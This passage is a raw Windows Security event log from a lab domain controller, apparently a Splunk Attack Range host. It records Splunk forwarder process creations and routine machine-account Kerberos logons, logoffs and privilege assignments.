Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe78
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264848
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264850
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5f4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264849
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x670
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:40:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264853
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x87CC4C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:40:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264852
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x87CC4C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53758
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:40:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264851
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x87CC4C
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:41:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264854
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264856
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x920
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264855
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x16bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:41:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264857
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x193c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:41:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264858
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:41:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264860
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x15b4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:41:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264859
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x980
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:41:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264862
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x87F997
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53763
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:41:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264861
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x87F997
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:41:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264863
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x87F997
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:41:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264866
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x880796
Logon Type: 3
04/19/2021 03:41:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264865
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x880796
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53772
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:41:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264864
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x880796
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:42:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264867
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x163c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
04/19/2021 03:42:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264869
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
04/19/2021 03:42:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264868
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x290
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
04/19/2021 03:42:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264870
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
04/19/2021 03:42:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264871
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x5fc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
04/19/2021 03:42:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264873
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1914
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
04/19/2021 03:42:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264872
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x195c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264879
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8837C4
Logon Type: 3
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264878
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8837C4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53781
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
04/19/2021 03:42:25 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264877
Keywords=Audit Success
Message=Special privileges assigned to new logon.
